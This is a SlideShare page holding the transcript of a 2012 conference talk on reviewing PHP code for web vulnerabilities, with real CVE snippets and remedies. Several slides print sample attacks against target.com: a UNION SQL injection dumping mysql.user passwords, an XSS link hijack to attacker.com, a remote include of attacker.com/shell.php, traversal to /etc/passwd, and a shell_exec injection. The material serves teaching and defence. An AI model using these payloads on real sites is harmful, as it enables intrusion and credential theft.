Spot the Web Vulnerability
Upcoming SlideShare
Loading in...5
×
 

Spot the Web Vulnerability

on

  • 4,819 views

These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.

These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.

Statistics

Views

Total Views
4,819
Views on SlideShare
4,782
Embed Views
37

Actions

Likes
2
Downloads
49
Comments
1

3 Embeds 37

https://twitter.com 31
https://si0.twimg.com 4
http://www.linkedin.com 2

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • Thanks ! Great material/studies/and work !
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Spot the Web Vulnerability Spot the Web Vulnerability Presentation Transcript

  • Spot the WebVulnerabilityMiroslav Štampar (dev@sqlmap.org)
  • Talk overview Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s)) Usage of code review on real-life vulnerabilities as an educational tool Mitigation in form of remedies Note: While given examples will discuss PHP coding (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language October 13th, 2012 2
  • Vulnerability statistics (1) October 13th, 2012 3
  • Vulnerability statistics (2) Name Visits Platform DatevBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability 31961 php 2010-08-29WordPress <= 3.3.1 Multiple Vulnerabilities 25960 php 2012-01-25WordPress 3.1.3 SQL Injection Vulnerabilities 25168 php 2011-07-01Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection 24166 php 2011-07-21Vulnerability 0-dayvBulletin(R) 3.8.6 faq.php Information Disclosure 22850 php 2010-07-24VulnerabilityvBulletin 4.0.x => 4.1.2 (search.php) SQL Injection 19074 php 2011-05-23VulnerabilityBypass the JQuery-Real-Person captcha plugin 0-day 17089 php 2011-11-28FCKeditor all version Arbitrary File Upload Vulnerability 16211 php 2011-08-09Joomla 1.5 URL Redirecting Vulnerability 16061 php 2010-08-24WordPress TimThumb Plugin - Remote Code Execution 15991 php 2011-08-03 October 13th, 2012 4
  • SQL injection (1) Vulnerability on dynamic database queries that include unfiltered user supplied input Usually result of concatenation of raw parameter values to a desired SQL statement Various techniques used depending on targets environment and affected vulnerable query The goal is unauthorized access to the underlying database Involved in 60% of all breach incidents examined by 7Safe in 2010 October 13th, 2012 5
  • SQL injection (2) Example of vulnerable code (vuln.php): <?php ... $sql = "SELECT * FROM forum_logs WHERE id = " . $_GET["id"]; $result = mysql_query($sql); ... ?> Sample attack: http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user-- October 13th, 2012 6
  • Cross-site scripting (1) Enables attackers to inject client-side script into web pages viewed by other users Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible Persistent (stored) and non-persistent (reflected) variants Samy (JS.Spacehero), first known XSS worm, infected over 1 million MySpace profiles in less than 20 hours October 13th, 2012 7
  • Cross-site scripting (2) Example of vulnerable code (vuln.php): <?php $name = $_GET[name]; echo "Welcome $name<br>"; echo "<a href="http://www.site.com/">Click to Visit</a>"; ?> Sample attack: http://www.target.com/vuln.php? name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href ="http://www.attacker.com/";}</script> October 13th, 2012 8
  • File inclusion (1) Allows inclusion of arbitrary code into vulnerable application for further execution Local file (LFI) and remote file (RFI) variants Attackers fondest wish (especially RFI) Access anything that the original program context is able to (configuration files, password files, etc.) Involved in 21% of all web application attacks observed by Imperva in 2011 October 13th, 2012 9
  • File inclusion (2) Example of vulnerable code (vuln.php): <?php $page = index; if (isset($_REQUEST[page])) $page = $_REQUEST[page]; include($page . .php); ?> Sample attack: http://www.target.com/vuln.php? page=http://www.attacker.com/shell.php?foo= October 13th, 2012 10
  • File disclosure (1) Access files that are not intended to be accessible and expose their content to the attackers Directory traversal variant in cases when characters for traverse to the parent directory (e.g. ../) are passed through to the file API(s) Local file inclusion becomes a variant too if used for obtaining a non-script content Easiest for exploitation October 13th, 2012 11
  • File disclosure (2) Example of vulnerable code (vuln.php): <?php $template = default.php; if (isset($_COOKIE[template])) $template = $_COOKIE[template]; readfile("templates/" . $template); ?> Sample attack: GET /vuln.php HTTP/1.0 Cookie: template= ../../../../../../../../../etc/passwd October 13th, 2012 12
  • Remote code execution (1) Provides a way to execute arbitrary code In one variant provided code is being executed inside the vulnerable web application (e.g. eval) In other, more common, content of one of request parameters is being written to the browser reachable file, giving attacker opportunity to run it as a standalone script TimThumb WordPress PHP plugin vulnerability (CVE: 2011-4106) affected 1.2 million websites October 13th, 2012 13
  • Remote code execution (2) Example of vulnerable code (vuln.php): <?php $fp = fopen("prefs/timezone.php", "w"); fwrite($fp, "<?phprn$timezone=" . $_REQUEST[tz] . ";rn?>"); fclose($fp); ?> Sample attack: http://www.target.com/vuln.php? tz=us;shell_exec($_GET[cmd]) http://www.target.com/prefs/timezone.php?cmd=cat /etc/passwd October 13th, 2012 14
  • Spot SQL injection (1) (EDB-ID: 18820, CVE: 2012-1002, if (isset($_POST[authornum]) && ctype_digit($_POST[authornum])) { OpenConf <= 4.11 OSVDB-ID: 78996) $oc_authorNum = $_POST[authornum]; } else { $anr = ocsql_query("SELECT * FROM `" . OCC_TABLE_PAPER . "` WHERE `paperid`=" . safeSQLstr($_POST[pid])) or err("Unable to retrieve submission information"); if (mysql_num_rows($anr) != 1) { err(oc_(Submission ID or password entered is incorrect)); } October 13th, 2012 15
  • Spot SQL injection (2) (EDB-ID: 19264, OSVDB-ID: 83231) if(empty($cookies[language])){ setcookie(MyTickets_language, MyTickets <= v2.0.8 $setting[default_language],time()+86400,"/"); $language = $setting[default_language]; } else { if($db->count(languages,"`id`=". $cookies[language]."") == 0){ $language = $setting[default_language]; } $language = $cookies[language]; } $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`=".$language."")); October 13th, 2012 16
  • WP-Predict Plugin for WordPress <= v1.0Spot SQL injection (3) foreach ($postPredicts as $postPredict){ (EDB-ID: 19715, OSVDB-ID: 83697) ... if ($_POST[postAction] == "submitVote" && intval($_POST[predictId]) == $postPredict- >predictId) { $submitPredictId = $_POST[predictId]; $selectedOption = $_POST[predictSelection]; ... $dbResult = @$wpdb->query("INSERT INTO " . $wpdb->prefix . "wpp_predict_votes (predictEntryId, predictUserId, predictSelectedOption) VALUES (" . $submitPredictId . ", " . $user_ID . ", " . $selectedOption . ")"); ... } October 13th, 2012 17
  • Spot SQL injection (4) (EDB-ID: 18516, OSVDB-ID: 79497) $start[year] = isset($_GET[sy]) ? phpDenora <= v1.4.6 htmlspecialchars($_GET[sy]) : date(Y); $start[month] = isset($_GET[sm]) ? htmlspecialchars($_GET[sm]) : date(m); $start[day] = isset($_GET[sd]) ? htmlspecialchars($_GET[sd]) : date(d); ... $sidq = sql_query("SELECT `id` FROM $table WHERE year = ".$start[year]." AND month = ". $start[month]." AND day = ".$start[day].""); October 13th, 2012 18
  • AdRotate Plugin for WordPress <= v3.6.6Spot SQL injection (5) (EDB-ID: 18114, CVE: 2011-4671, if(isset($_GET[track]) OR $_GET[track] != ) { OSVDB-ID: 77507) $meta = base64_decode($_GET[track]); ... list($ad, $group, $block) = explode("-", $meta); ... $bannerurl = $wpdb->get_var($wpdb- >prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = ".$ad." LIMIT 1;")); ... } October 13th, 2012 19
  • WP Bannerize Plugin for WordPress <= v2.8.7Spot SQL injection (6) (EDB-ID: 17906, OSVDB-ID: 76658) if (@isset($_SERVER[HTTP_X_REQUESTED_WITH])) { ... $limit = intval($_POST[limit]); $page_offset = (intval($_POST[offset]) - 1) * $limit; foreach($_POST["item"] as $key => $value){ $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset), $value); $result = mysql_query($sql); } } October 13th, 2012 20
  • Spot cross-site scripting (1) (EDB-ID: 11017, OSVDB-ID: 61594) PHPDug <= v2.0.0 $page = new HtmlTemplate("templates/" . $config[tpl_name] . "/index.html"); ... $page->SetParameter(UPCOMING_LINK, $config[site_url].upcoming.php?id=.$_GET[id]); $page->SetParameter(POPULAR_LINK, $config[site_url].index.php); ... $page->CreatePageEcho($lang,$config); October 13th, 2012 21
  • Spot cross-site scripting (2) function _wp_comment_row($comment_id, $mode, (EDB-ID: 9250, CVE: 2009-2851, $comment_status, $checkbox = true, $from_ajax = WordPress <= v2.8.1 false) { OSVDB-ID: 56193) $comment = get_comment($comment_id); ... $author_url = get_comment_author_url(); ... $author_url_display = $author_url; ... echo "<a title=$author_url href= $author_url>$author_url_display</a><br/>"; ... } ... foreach ($comments as $comment) _wp_comment_row($comment->comment_ID, $mode, $comment_status); October 13th, 2012 22
  • Spot cross-site scripting (3) damianov.net Shoutbox <= v1.0 $handle = fopen($shoutsFile,"a"); $toWrite="n".stripslashes($_POST["txtNick"]) . "|" . $_POST["txtEmail"] . "|" . stripslashes($_POST["txtShout"]); (EDB-ID: 12593) fwrite($handle, $toWrite); fclose($handle); ... $lines = array_reverse(file($shoutsFile)); foreach ($lines as $line_num => $line) { $info = explode("|", $line, 3); if ((is_email($info[1])) && $displayEmails) $info[0] = "<a href=mailto:" . $info[1] . ">" . $info[0] . "</a>"; echo "<div style=$fontStyle><b>$info[0]</b> : " . ($allowHTML ? $info[2] : strip_tags($info[2])) . "</div>n"; // CVE-2004-0595 (strip_tags() bypass) } October 13th, 2012 23
  • Spot file inclusion (1) (EDB-ID: 15166, OSVDB-ID: 68300) Zen Cart <= v1.3.9f $typefilter = default; if (isset($_GET[typefilter])) $typefilter = $_GET[typefilter]; require(DIR_WS_INCLUDES . zen_get_index_filters_directory($typefilter . _filter.php)); October 13th, 2012 24
  • Spot file inclusion (2) (EDB-ID: 19550, OSVDB-ID: 83700) if (isset($_POST[lang]) && preg_replace("#.*/#","", phpMyBackupPro <= v2.2 $_SERVER[PHP_SELF])=="config.php" $CONF[lang]=$_POST[lang]; if (!isset($CONF[lang])) $CONF[lang]="english"; if (!file_exists($prepath.PMBP_LANGUAGE_DIR. $CONF[lang].".inc.php")) include_once($prepath.PMBP_LANGUAGE_DIR . "english.inc.php"); else include($prepath.PMBP_LANGUAGE_DIR . $CONF[lang].".inc.php"); October 13th, 2012 25
  • Relocate Upload Plugin for WordPress <=Spot file inclusion (3) (EDB-ID: 17869, CVE: 2012-1205, OSVDB-ID: 79250) if (isset($_GET[ru_folder])) { v0.14 define(WP_USE_THEMES, false); require_once(urldecode($_GET[abspath]) . /wp-load.php); ... } October 13th, 2012 26
  • Spot file disclosure (1) ISPworker <= v1.23 (EDB-ID: 10262) header(Content-type: . $_REQUEST[type]); header(Content-Disposition: attachment; filename=" . $_REQUEST[filename] . "); readfile("./tmp/$ticketid" . "_" . $_REQUEST[filename]); October 13th, 2012 27
  • PICA Photo Gallery Plugin for WordPress <=Spot file disclosure (2) (EDB-ID: 19016, OSVDB-ID: 82702) $timg = $imgname = $_REQUEST[imgname]; $pluginName = pica-photo-gallery; $file = dirname(dirname(dirname(__FILE__))) . "/uploads/" . $pluginName . "/" . $timg; header(Content-Description: File Transfer); v1.0 header(Content-Type: application/octet-stream); ... header(Content-Length: . filesize($file)); ob_clean(); flush(); readfile($file); October 13th, 2012 28
  • Spot remote code execution (1) (EDB-ID: 18775, CVE: 2012-1495, $file = ../includes/settings.php; ... WebCalendar <= v1.2.4 $settings[single_user_login] = getPostValue OSVDB-ID: 81329) (form_single_user_login); ... $fd = @fopen ($file, w+b, false); ... fwrite ($fd, "<?phprn"); fwrite ($fd, /* updated via install/index.php on . date (r) . "rn"); foreach ($settings as $k => $v) { if ($v != <br /> && $v != ) fwrite ($fd, $k . : . $v . "rn"); } October 13th, 2012 29
  • Spot remote code execution (2) Ajax File and Image Manager <= v1.0 (EDB-ID: 18075, CVE: 2011-4825, @ob_start(); displayArray($_POST); writeInfo(@ob_get_clean()); OSVDB-ID: 76928) ... function writeInfo($data, $die = false) { $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . data.php, w+); @fwrite($fp, $data); @fwrite($fp, "nn" . date(d/M/Y H:i:s)); @fclose($fp); ... } October 13th, 2012 30
  • Remedies (1) Data validation Process of ensuring that application is running with correct data Discard if it doesn’t pass the validation process if (!preg_match(/^(?d{3})?[-s.]?d{3}[-s.]d{4}$/, $phone)) { echo "Your phone number is invalid"; die(); } October 13th, 2012 31
  • Remedies (2) Data sanitization Removing any unwanted bits from the data and normalizing it to the correct form $comment = strip_tags($_POST[comment]); ... $id = intval($_GET[id]); ... $username = preg_replace(/[^a-zA-Z0-9._]/, , $_REQUEST[username]); ... $query = sprintf("SELECT * FROM users WHERE user=%s AND password=%s", mysql_real_escape_string($user), mysql_real_escape_string($password)); October 13th, 2012 32
  • Remedies (3) Output escaping Protecting integrity of displayed data Prevents browser from applying any unintended meaning to any special sequence of characters that may be found Always escape output provided by users! echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES); October 13th, 2012 33
  • Remedies (4) Safe communication with a database Prepared statements use one channel for commands and another one for data (which never allows commands) $db = new PDO(dblib:host=localhost; dbname=testdb; charset=UTF-8, $user, $pass); $query = SELECT * FROM users WHERE id = :id; $stmt = $db->prepare($query); $stmt->bindValue(:id, $_REQUEST[id]); $stmt->execute(); while($row = $stmt->fetch(PDO::FETCH_ASSOC)) { ... October 13th, 2012 34
  • Questions? October 13th, 2012 35